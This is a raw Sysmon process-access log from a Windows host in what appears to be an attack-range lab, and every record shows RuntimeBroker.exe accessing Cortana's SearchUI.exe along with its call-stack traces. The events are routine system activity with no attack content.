13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405340C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405340C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405300C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405340C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405340C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405984C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405984C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
